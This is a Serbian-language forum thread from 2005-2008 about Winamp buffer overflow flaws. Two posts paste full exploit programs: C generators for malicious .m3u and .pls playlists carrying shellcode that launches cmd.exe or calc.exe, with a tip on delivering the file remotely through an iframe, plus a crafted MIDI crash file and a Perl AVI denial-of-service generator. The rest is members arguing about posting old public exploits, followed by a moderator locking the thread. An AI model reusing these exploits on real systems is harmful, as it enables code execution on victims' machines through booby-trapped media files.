[es] - winamp remote buffer overflow

oxygenne

Član broj: 19728
Poruke: 13
62.162.201.*

Profil

^{18.07.2005. u 12:37 - pre 242 meseci}

Ovo je bio exploit za winamp koji se pojavio samo na kratko

#include <stdio.h>
#include <stdlib.h>

#define HEADER1 "#EXTM3U\n"
#define HEADER2 "#EXTINF:0,Exploit Winamp v5.0x-5.05 \n"

char shellcode[]=
"cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHH" //Padding
"\x9F\x44\xDE\x5E" //Offset del JMP ESP en olepro32.dll wXP SP2
"JJJJ"
"\x8B\xE5\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6"
"\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
"\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8"
"\xC7\x93\xC2\x77" //Offset de la llamada a system() en msvcrt.dll wXP SP2
"\x50\x8D\x5D\xF8\x53\xFF\xD0\n\r";

int main(int argc, char* argv[]) {
FILE *fp;
char *sc=(char *)malloc(sizeof(shellcode)+1);

printf ("\nExploit Winamp v5.0x-5.05 por Rojodos (modif TaU)\n");
printf ("Testeado en Winamp 5.03 y winXP SP2\n\n");
printf ("Generador de m3u basado en el del primer exploit publicado el 24.11.2004\n");
printf ("en http://www.k-otik.com/exploits/20041124.winampm3u.c.php\n\n");

if (sc == NULL) {
printf ("malloc error\n");
return -1;
}

memset(sc,'\0',sizeof(sc));
memcpy(sc, shellcode, sizeof(shellcode) );

fp = fopen ("test2.m3u","w+");
if (!fp) {
printf (" error opening file.\n");
return -1;
}

fwrite (HEADER1, 1, strlen (HEADER1), fp);
fwrite (HEADER2, 1, strlen (HEADER2), fp);
fwrite (sc , 1, strlen(sc) , fp);
fclose (fp);

printf ("\nArchivo <test2.m3u> creado. \n\n");
return 0;

}

Nikako da napravim portbind shellcode za ovo ili reverse

DJ_DzoNe
Balkan

Član broj: 167439
Poruke: 49
77.46.209.*

Sajt: www.EDzTeam.com

Profil

Re: winamp remote buffer overflow

^{28.12.2007. u 00:32 - pre 212 meseci}

Winamp 5.12 Remote Buffer Overflow Universal Exploit:

Code:
/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Duble click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotly,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN 0x045D
#define PLAYLIST_FILE "crafted.pls"

char szPlayListHeader1[] = "[playlist]\r\nFile1=\\\\";
char szPlayListHeader2[] = "\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n";

// Jump to shellcode
char jumpcode[] = "\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4";

// Harmless Calc.exe
char shellcode[] =
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
"\x61\xdd\x0e\x4d";

int main(int argc,char *argv[])
{
printf("\nWinamp 5.12 Remote Buffer Overflow Universal Exploit");
printf("\nBug discovered & exploit coded by ATmaCA");
printf("\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com");
printf("\nE-Mail: atmaca@icqmail.com");
printf("\nCredit to Kozan");

FILE *File;
char *pszBuffer;

if ( (File = fopen(PLAYLIST_FILE,"w+b")) == NULL ) {
printf("\n [Err:] fopen()");
exit(1);
}

pszBuffer = (char*)malloc(BUF_LEN);
memset(pszBuffer,0x90,BUF_LEN);
memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1);
memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);
memcpy(pszBuffer+0x0412,jumpcode,sizeof(jumpcode)-1);
memcpy(pszBuffer+0x0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1);

fwrite(pszBuffer, BUF_LEN, 1,File);
fclose(File);

printf("\n\n" PLAYLIST_FILE " has been created in the current directory.\n");
return 1;
}

Winamp 5.21 - Midi Buffer Overflow in_midi.dll:

Code:
/*

* ********************************************** *
* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
* ********************************************** *
* PoC coded by: BassReFLeX *
* Date: 19 Jun 2006 *
* ********************************************** *

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

char header[] = "\x4D\x54\x68\x64\x00\x00"
"\x00\x06\x00\x00\x00\x01"
"\x00\x60\x4D\x54\x72\x6B"
"\x00\x00";

char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF";

int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************** *");
printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
printf("\n* ********************************************** *");
printf("\n* PoC coded by: BassReFLeX *");
printf("\n* Date: 19 Jun 2006 *");
printf("\n* ********************************************** *");

if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}

printf("\n\nWriting crafted .mid file...");
fwrite(header,1,sizeof(header),f);
fwrite(badc0de,1,sizeof(badc0de),f);
printf("\nFile created successfully!");
printf("\nFile: %s",argv[1]);
return 0;
}

void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
exit(1);
}

Winamp = 5.33 (.AVI File) Remote Denial of Service Exploit:

Code:
#!/usr/bin/perl

# Winamp Buffer Overflow DOS Exploit (0-DAY)

# Testet:Ver 5.3

# Discoverd By = DeltahackingTEAM    Bug Found & Exploitet By /Farzad.Sharifi(Dr.Trojan)

# Risk = High

#Exploit(EXE) =http://www.deltahacking.net/exp/winamp.exe

#Exploit(PL)  =http://www.deltahacking.net/exp/winamp.pl

#OverflowFile(Avi) =http://www.deltahacking.net/exp/Dr.Trojan.avi

# Winamp Media Player Download=>http://www.winamp.com/

{

    print "\n================================================================================\n";

    print "\                                DeltahackingTEAM \n";

    print "\                            Delta.Secure[A]Gmail.com\n";

    print "\                      Winamp Buffer Overflow DOS Exploit \n";

    print "\We Are:Dr.Trojan,H!v++,D_7j,Impostor,Vpc,LOrd, Dr.Pantagon..Tanks 4 Mr.Str0ke \n";

    print "\Http://Deltahacking.net & Http://DeltaSecurity.ir & Http://PersianWhois.com\n ";

    print "\    n-------------------Exploit Completed(File Create)!-------------------\n";

    print "\n================================================================================\n";

}

open(avi, ">./Dr.Trojan.avi");

print avi "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".

print avi "\x4D\x54\x68\x64";

print avi "\x4D\x54\x68\x64";

print avi "\x4D\x54\x68\x64";

print avi "\x4D\x54\x68\x64";

print avi "\x4D\x54\x68\x64";

#0nLy Iran :X
#Farzad.Sharifi

# milw0rm.com [2007-04-23]

www.EDzTeam.com

Muzika nije prenosilac poruke, ona je poruka. Ako muzika funkcioniše, sve ide!
Dave Clarke

EArthquake

Član broj: 20684
Poruke: 884
*.eunet.yu.

+67 Profil

Re: winamp remote buffer overflow

^{29.12.2007. u 12:24 - pre 212 meseci}

svaka cast , mada verujem da i ostali korisnici foruma umeju da pogledaju na milw0rm kad im nesto zatreba ...

poenta je sto je bug i exploit u prvom postu nasao i napisao sam Downbload

_{[Ovu poruku je menjao EArthquake dana 29.12.2007. u 19:06 GMT+1]}

Danilo Cvjeticanin
Danilo Cvjeticanin
Apatin-Beograd

Član broj: 9614
Poruke: 3517
77.46.177.*

+37 Profil

Re: winamp remote buffer overflow

^{29.12.2007. u 18:06 - pre 212 meseci}

I jos + sto je to sve jako staro i neiskoristivo, 98% exploita sa milw0rm-a mora da se prepravlja. Ko ne veruje neka proba. Public exploiti su uvek neiskoristivi!

DJ_DzoNe
Balkan

Član broj: 167439
Poruke: 49
77.46.209.*

Sajt: www.EDzTeam.com

Profil

Re: winamp remote buffer overflow

^{30.12.2007. u 23:30 - pre 212 meseci}

Pa jeste u pravu si.
Po tvom nekom razmisljanju onda nista nikad ne bi trebalo napisati nigde.
A sto se tice gresaka, verujem da vecini nije tesko prepraviti, u vecini slucajeva bezazlene sintaksicne greske.

www.EDzTeam.com

Muzika nije prenosilac poruke, ona je poruka. Ako muzika funkcioniše, sve ide!
Dave Clarke

Danilo Cvjeticanin
Danilo Cvjeticanin
Apatin-Beograd

Član broj: 9614
Poruke: 3517
77.46.177.*

+37 Profil

Re: winamp remote buffer overflow

^{31.12.2007. u 08:45 - pre 212 meseci}

Pa ovde ne bi trebalo pisati na tu temu. Malo je kompetentnih,a i ti sto znaju nece da pisu jer to po njima nije "kvalitetna" diskusija. Ti ako zelis pisi, meni ne smeta,cak sta vise i volim da procitam i pogledam novije stvari, ali novije! A prepravljanje? Sintaksticne greskice??? lol, nemas pojma!

Mitrović Srđan
bloodzero
Freelance
Majur //: Šabac

Član broj: 10261
Poruke: 2800
*.ptt.yu.

Sajt: freeshell-reviews.com

+4 Profil

Re: winamp remote buffer overflow

^{31.12.2007. u 09:21 - pre 212 meseci}

Citat:

Sintaksticne greskice???

:))

Tony Melendez:
http://video.google.com/videoplay?docid=-
3819862628517136815&q=tony+melendez

NIKADA NE UZIMATI HOSTING NA GO DADDY!

fearless

Član broj: 74584
Poruke: 156
212.62.59.*

Sajt: www.phearless.org

Profil

Re: winamp remote buffer overflow

^{02.01.2008. u 19:59 - pre 212 meseci}

Zašto li sam pisao pravilnik?

Citat:

1. Ovo nije mesto gde cete postovati novoobjavljene exploite[1], upozoravati na njih (za to
postoje drugi forumi u okviru Security) ili traziti upustva za upotrebu. Ovo jeste mesto gde
mozete postovati novoobjavljene ranjivosti[2] i traziti pomoc oko exploitacije istih (ne odnosi
se na web aplikacije tipa forumi i slicno).

Citat:

3. Stavka 1. iz ovog pravilnika se ne odnosi na one koji postuju exploite koje su sami pisali.
Takodje, ako ste otkrili neku ranjivost, slucajno ili sa namerom i zelite da je podelite slobodni
ste da to uradite. Tekstove i clanke koji govore o nekim osnovama security codinga (prosti
oblici exploitacije buffer overflow-a[3] recimo) postujte ovde ako mislite da mogu nekome
pomoci jer nema potrebe otvarati nove teme za tako nesto.

Phearless - Serbian/Croatian Security Magazine: www.phearless.org

DJ_DzoNe
Balkan

Član broj: 167439
Poruke: 49
77.46.209.*

Sajt: www.EDzTeam.com

Profil

Re: winamp remote buffer overflow

^{03.01.2008. u 00:27 - pre 212 meseci}

OK. Nemam pojma :]
Najlakse je pokrenuti ispravan cod (exploit) i reci ja sam haker!

www.EDzTeam.com

Muzika nije prenosilac poruke, ona je poruka. Ako muzika funkcioniše, sve ide!
Dave Clarke

Mitrović Srđan
bloodzero
Freelance
Majur //: Šabac

Član broj: 10261
Poruke: 2800
*.ptt.yu.

Sajt: freeshell-reviews.com

+4 Profil

Re: winamp remote buffer overflow

^{03.01.2008. u 11:05 - pre 212 meseci}

Da je tako svako bi danas bio haker.

Tony Melendez:
http://video.google.com/videoplay?docid=-
3819862628517136815&q=tony+melendez

NIKADA NE UZIMATI HOSTING NA GO DADDY!

jovica016
Jovica Ilic

Član broj: 94502
Poruke: 202
91.150.120.*

Sajt: www.jovicailic.org

+10 Profil

Re: winamp remote buffer overflow

^{03.01.2008. u 13:57 - pre 212 meseci}

Citat:

DJ_DzoNe: OK. Nemam pojma :]
Najlakse je pokrenuti ispravan cod (exploit) i reci ja sam haker!

Veliki broj uglavnom bezveznih postova za kratko vreme po svim forumima... jel to slucajno?

Ili se meni samo cini.... mozda gresim...

Izvinjavam se sto skrecem s teme.

http://www.jovicailic.org

Shadowed
Vojvodina

Član broj: 649
Poruke: 12882

+4827 Profil

Re: winamp remote buffer overflow

^{03.01.2008. u 15:26 - pre 212 meseci}

Citat:

fearless:

Citat:

A posto o originalnoj temi nema diskusije (a i prilicno je zastarelo sada), zakljucacu.

Nebojsa Milanovic:
-Trumpa smatram vrhunskim predsednikom i voleo bih da živim u državi na čijem je on čelu
-Rusija ne laže, ne vodi osvajačke ratove
-Trump je svetla tačka u USA blatu
-Elon Musk, možda najpametniji i najtrezveniji Amerikanac